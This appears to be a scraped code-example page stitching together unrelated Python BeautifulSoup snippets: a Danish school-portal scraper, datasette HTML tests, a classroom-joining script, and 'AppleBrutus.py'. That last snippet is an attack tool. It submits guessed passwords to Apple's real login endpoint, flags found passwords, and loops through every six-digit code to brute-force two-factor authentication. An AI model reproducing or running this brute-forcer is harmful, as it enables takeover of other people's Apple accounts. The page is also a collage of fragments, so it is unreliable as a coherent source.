    if soup.find("div", attrs={"id": "m_Content_islandViewForløb_pa"}) is None:
        return {"status": False, "error": "Data not found"}

    headers = []
    elements = []

    for row in soup.find("div", attrs={
            "id": "m_Content_islandViewForløb_pa"
    }).find("table").findAll("tr", recursive=False):
        headers.append(row.find("th", recursive=False))
        elements.append(row.find("td", recursive=False))

    rows = functions.mapRows(headers, elements)

    changeProg = re.compile(
        r"(?P<date>.*) af (?P<teacher>.*) \((?P<abbrevation>.*)\)")
    teamProg = re.compile(ur"(?P<term>.*): (?P<team>.*)")

    teams = []
    periods = []
    focusPoints = []
    workMethods = []
    activities = []
    assignments = []

    periodeProg = re.compile(r"(?P<start>.*)	-	(?P<end>.*)")
    activityProg = re.compile(
        r"\/lectio\/(?P<school_id>.*)\/aktivitet\/aktivitetinfo.aspx\?id=(?P<activity_id>.*)&prevurl=(?P<prev_url>.*)"
    )

    if not rows["Aktiviteter"].find(
            attrs={"id": "m_Content_ActivitiesGV"}) is None:
        for row in rows["Aktiviteter"].find(attrs={
                "id": "m_Content_ActivitiesGV"
        }).findAll("tr")[1:]:
            elements = row.findAll("td")
            activityGroups = activityProg.match(elements[1].find("a")["href"])
            activities.append({
                "activity_id":
                activityGroups.group("activity_id")
                if not activityGroups is None else ""
            })

    if not rows["Skriftligtarbejde"].find(
            attrs={"id": "m_Content_ExercisesGrid"}) is None:
        for row in rows["Skriftligtarbejde"].find(
                attrs={
                    "id": "m_Content_ExercisesGrid"
                }).findAll("tr")[1:]:
            elements = row.findAll("td")

            assignments.append({
                "name":
                unicode(elements[0].text),
                "date":
                datetime.strptime(elements[1].text.strip(), "%d-%m-%Y")
            })

    for row in rows["Periode(r)"].text.strip().replace("\r\n", "").split("\n"):
        periodeGroups = periodeProg.match(row)

        periods.append({
            "start":
            datetime.strptime(
                periodeGroups.group("start").strip(), "%d-%m-%Y")
            if not periodeGroups is None else "",
            "end":
            datetime.strptime(periodeGroups.group("end").strip(), "%d-%m-%Y")
            if not periodeGroups is None else ""
        })

    for row in rows["Arbejdsformer"].findAll("span"):
        workMethods.append({"text": unicode(functions.cleanText(row.text))})

    termProg = re.compile(r"(?P<value>.*)\/(?P<end>.*)")

    for row in rows["Hold"].findAll("span"):
        teamGroups = teamProg.match(row.text)
        termGroups = termProg.match(
            teamGroups.group("term") if not teamGroups is None else "")
        teams.append({
            "context_card_id":
            row["lectiocontextcard"],
            "team_element_id":
            row["lectiocontextcard"].replace("HE", ""),
            "name":
            teamGroups.group("team") if not teamGroups is None else "",
            "term": {
                "years_string":
                teamGroups.group("term") if not teamGroups is None else "",
                "value":
                termGroups.group("value") if not termGroups is None else ""
            }
        })

    if not rows["Saerligefokuspunkter"].find("ul") is None:
        focusRows = rows["Saerligefokuspunkter"].find("ul").findAll(
            "li", recursive=False)

        if len(focusRows) > 0:
            for row in focusRows:
                header = unicode(row.text)
                focusPointElements = []
                if row.find_next().name == "ul":
                    for focusElement in row.find_next().findAll("li"):
                        focusPointElements.append(
                            focusElement.text.encode("utf8"))

                focusPoints.append({
                    "header": header,
                    "elements": focusPointElements
                })

    changedGroups = changeProg.match(rows["Sidstaendret"].text.strip().replace(
        "\r\n", "").replace("\t", ""))
    createdGroups = changeProg.match(rows["Oprettet"].text.strip().replace(
        "\r\n", "").replace("\t", ""))

    estimate = rows["Estimat"].text.strip().replace("\r\n", "").replace(
        "\t", "").replace(" moduler", "").replace(",", ".")

    information = {
        "title":
        rows["Titel"].text.strip().replace("\r\n",
                                           "").replace("\t",
                                                       "").encode("utf8"),
        "note":
        rows["Note"].text.strip().replace("\r\n",
                                          "").replace("\t", "").encode("utf8"),
        "estimate": {
            "type": "modules",
            "length": "none" if estimate == "ingen" else estimate
        },
        "changed": {
            "date":
            datetime.strptime(changedGroups.group("date"), "%d/%m-%Y")
            if not changedGroups is None else "",
            "teacher": {
                "name":
                unicode(changedGroups.group("teacher"))
                if not changedGroups is None else "",
                "abbrevation":
                unicode(changedGroups.group("abbrevation"))
                if not changedGroups is None else ""
            }
        },
        "teams":
        teams,
        "created": {
            "date":
            datetime.strptime(createdGroups.group("date"), "%d/%m-%Y")
            if not createdGroups is None else "",
            "teacher": {
                "name":
                unicode(createdGroups.group("teacher"))
                if not createdGroups is None else "",
                "abbrevation":
                unicode(createdGroups.group("abbrevation"))
                if not createdGroups is None else ""
            }
        },
        "periods":
        periods,
        "focus_points":
        focusPoints,
        "methods":
        workMethods,
        "activities":
        activities,
        "assignments":
        assignments
    }

    return {"status": "ok", "phase": information}

예제 #27

0

파일 보기

파일: test_html.py 프로젝트: amjith/datasette

def test_sort_links(app_client):
    response = app_client.get("/fixtures/sortable?_sort=sortable")
    assert response.status == 200
    ths = Soup(response.body, "html.parser").findAll("th")
    attrs_and_link_attrs = [{
        "attrs":
        th.attrs,
        "a_href":
        (th.find("a")["href"].split("/")[-1] if th.find("a") else None),
    } for th in ths]
    assert [
        {
            "attrs": {
                "class": ["col-Link"],
                "scope": "col"
            },
            "a_href": None
        },
        {
            "attrs": {
                "class": ["col-pk1"],
                "scope": "col"
            },
            "a_href": None
        },
        {
            "attrs": {
                "class": ["col-pk2"],
                "scope": "col"
            },
            "a_href": None
        },
        {
            "attrs": {
                "class": ["col-content"],
                "scope": "col"
            },
            "a_href": None
        },
        {
            "attrs": {
                "class": ["col-sortable"],
                "scope": "col"
            },
            "a_href": "sortable?_sort_desc=sortable",
        },
        {
            "attrs": {
                "class": ["col-sortable_with_nulls"],
                "scope": "col"
            },
            "a_href": "sortable?_sort=sortable_with_nulls",
        },
        {
            "attrs": {
                "class": ["col-sortable_with_nulls_2"],
                "scope": "col"
            },
            "a_href": "sortable?_sort=sortable_with_nulls_2",
        },
        {
            "attrs": {
                "class": ["col-text"],
                "scope": "col"
            },
            "a_href": "sortable?_sort=text",
        },
    ] == attrs_and_link_attrs

예제 #28

0

파일 보기

파일: AppleBrutus.py 프로젝트: userlandkernel/HVA

    def attempt(self, environ="PROD", appleid=None, password=None):
        # Retrieve the login page content
        loginpage = self.s.get(self.ids, allow_redirects=True)

        # If the status isn't HTTP_OK something must be wrong with the application
        if loginpage.status_code != 200:
            raise BaseException("Login page returned error")

        # Find the login
        soup = Soup(loginpage.text, "html.parser")
        form = soup.find("form",
                         {"name": "form2"})  # Login form is named form2

        # Automatically retrieve fields and set post data for requests
        formdata = dict()
        for element in form.find_all("input"):
            try:
                formdata[element["name"]] = element["value"]
            except Exception as exc:
                pass

        # Set the username and password
        if not appleid:
            appleid = str(input("APPLE ID: "))
        if not password:
            password = str(input("PASSWORD: "******"appleId"] = appleid
        formdata["accountPassword"] = password

        # Apparently you can log into dev account

        formdata["ENV"] = environ

        # Authenticate with Apple
        print("[{}]: TRYING {}...".format(appleid, password))
        authres = self.s.post(
            "https://idmsa.apple.com/IDMSWebAuth/authenticate",
            data=formdata,
            allow_redirects=True)

        # Check if login failed
        if "Your account information was entered incorrectly" in authres.text:
            print("WRONG PASSWORD")
            return 1

        elif "Your Apple ID or password was entered incorrectly" in authres.text:
            print("ACCOUNT DOES NOT EXIST")
            return 2

        # Check if 2FA code is required
        elif "Verify your identity" in authres.text:
            print("PASSWORD FOUND: {}".format(password))
            print("TWO FACTOR")
            # Find form for 2FA code
            soup = Soup(authres.text, "html.parser")
            twofactor = soup.find(
                "form",
                {"id": "command"})  # 2FA code form has HTML id 'command'

            # Brute force the digits
            for i in range(0, 1000000):
                code = str(
                    i
                )  # Cast to string so we can add prefix of zeroes if needed

                # Add prefix if needed
                while len(code) < 6:
                    code = "0" + code
                # Set value of the digit input fields to corresponding digit from bruteforce
                for n in range(0, 5):
                    formdata['digit' + str(i + 1)] = code[n]

                print("Trying {}".format(code), end=": ")

                # Try 2-FA code
                twofalogin = self.s.post(
                    "https://idmsa.apple.com/IDMSWebAuth/" +
                    twofactor['action'],
                    data=formdata,
                    allow_redirects=True)

                if "Unauthorized access detected" in twofalogin.text:
                    print("UNAUTHORIZED ACCESS DETECTED")
                    break  # Just give up, they caught us
                else:
                    break
                    #print(twofalogin.text)

        elif "This Apple ID has been locked for security reasons" in authres.text:
            print("APPLE ID BLOCKED :(")
            return 2
        else:
            print(authres.text)
            print("SUCCESS")
            return 0

예제 #29

0

파일 보기

파일: test_html.py 프로젝트: amjith/datasette

def test_database_download_disallowed_for_mutable(app_client):
    response = app_client.get("/fixtures")
    soup = Soup(response.body, "html.parser")
    assert 0 == len(soup.findAll("a", {"href": re.compile(r"\.db$")}))
    assert 403 == app_client.get("/fixtures.db").status

예제 #30

0

파일 보기

파일: BrightSpacingOnLSD.py 프로젝트: userlandkernel/HVA

    def JoinClassroom(self):
        self.home = self.sso.Request("/d2l/home/196867")
        classroom = Soup(self.home, "lxml")
        classroom = classroom.find('d2l-menu-item-link',
                                   {"text": "Virtual Classroom"})
        self.classroom = Soup(self.sso.Request(classroom['href']),
                              "html.parser")
        self.classroom = self.classroom.find("iframe",
                                             {"class": "d2l-iframe-offscreen"})
        self.classroom = Soup(self.sso.Request(self.classroom['src']),
                              "html.parser")
        self.classroom = self.classroom.find("form", {"id": "LtiRequestForm"})

        bongobase = self.classroom['action']
        bongodata = {
            "launch_presentation_locale":
            "EN-GB",
            "tool_consumer_instance_guid":
            self.classroom.find(
                "input", {"name": "tool_consumer_instance_guid"})['value'],
            "tool_consumer_instance_name":
            "YouSeeU",
            "tool_consumer_info_version":
            self.classroom.find(
                "input", {"name": "tool_consumer_info_version"})['value'],
            "tool_consumer_info_product_family_code":
            "desire2learn",
            "context_id":
            str(self.classroom.find("input", {"name": "context_id"})['value']),
            "context_title":
            "Fundamentals 1",
            "context_label":
            str(
                self.classroom.find("input",
                                    {"name": "context_label"})['value']),
            "resource_link_description":
            "Virtual Classroom Launch",
            "lis_outcome_service_url":
            str(
                self.classroom.find(
                    "input", {"name": "lis_outcome_service_url"})['value']),
            "lti_version":
            str(
                self.classroom.find("input",
                                    {"name": "lti_version"})['value']),
            "lti_message_type":
            str(
                self.classroom.find("input",
                                    {"name": "lti_message_type"})['value']),
            "user_id":
            str(self.classroom.find("input", {"name": "user_id"})['value']),
            "roles":
            str(self.classroom.find("input", {"name": "roles"})['value']),
            "lis_person_name_given":
            str(
                self.classroom.find(
                    "input", {"name": "lis_person_name_given"})['value']),
            "lis_person_name_family":
            str(
                self.classroom.find(
                    "input", {"name": "lis_person_name_family"})['value']),
            "lis_person_name_full":
            str(
                self.classroom.find(
                    "input", {"name": "lis_person_name_full"})['value']),
            "lis_person_contact_email_primary":
            str(
                self.classroom.find(
                    "input",
                    {"name": "lis_person_contact_email_primary"})['value']),
            "ext_d2l_tenantid":
            str(
                self.classroom.find("input",
                                    {"name": "ext_d2l_tenantid"})['value']),
            "ext_tc_profile_url":
            str(
                self.classroom.find("input",
                                    {"name": "ext_tc_profile_url"})['value']),
            "ext_d2l_context_id_history":
            str(
                self.classroom.find(
                    "input", {"name": "ext_d2l_context_id_history"})['value']),
            "ext_d2l_resource_link_id_history":
            str(
                self.classroom.find(
                    "input",
                    {"name": "ext_d2l_resource_link_id_history"})['value']),
            "lis_result_sourcedid":
            str(
                self.classroom.find(
                    "input", {"name": "lis_result_sourcedid"})['value']),
            "ext_d2l_link_id":
            str(
                self.classroom.find("input",
                                    {"name": "ext_d2l_link_id"})['value']),
            "custom_links_outcome_service_url":
            str(
                self.classroom.find(
                    "input",
                    {"name": "custom_links_outcome_service_url"})['value']),
            "launch_presentation_return_url":
            str(
                self.classroom.find(
                    "input",
                    {"name": "launch_presentation_return_url"})['value']),
            "oauth_version":
            str(
                self.classroom.find("input",
                                    {"name": "oauth_version"})['value']),
            "oauth_nonce":
            str(
                self.classroom.find("input",
                                    {"name": "oauth_nonce"})['value']),
            "oauth_timestamp":
            str(
                self.classroom.find("input",
                                    {"name": "oauth_timestamp"})['value']),
            "oauth_signature_method":
            str(
                self.classroom.find(
                    "input", {"name": "oauth_signature_method"})['value']),
            "oauth_consumer_key":
            str(
                self.classroom.find("input",
                                    {"name": "oauth_consumer_key"})['value']),
            "oauth_callback":
            str(
                self.classroom.find(
                    "input",
                    {"name": "oauth_callback"})['value']),  # Test for XSS lmao
            "oauth_signature":
            str(
                self.classroom.find("input",
                                    {"name": "oauth_signature"})['value']),
            "ext_basiclti_submit":
            str(
                self.classroom.find("input",
                                    {"name": "ext_basiclti_submit"})['value'])
        }

        for el in self.classroom.find_all("input"):
            bongodata[el['name']] = el['value']

        print("Joining Virtual Classroom....")
        print(json.dumps(bongodata))

        self.classroom = self.sso.s.post(bongobase,
                                         data=bongodata,
                                         allow_redirects=True)
        s = self.classroom.text
        start = "redirectUrl = '"
        end = "';"
        self.classroom = re.search('%s(.*)%s' % (start, end), s).group(1)
        self.classroom = self.sso.s.get(self.classroom, allow_redirects=True)

        if "You need to enable" in self.classroom.text:
            print(
                "We joined bongo, hooray. However it requires JS and I still need to reverse engineer more of Bongo in order to join the classroom"
            )

        else:
            print("Something went wrong while joining bongo")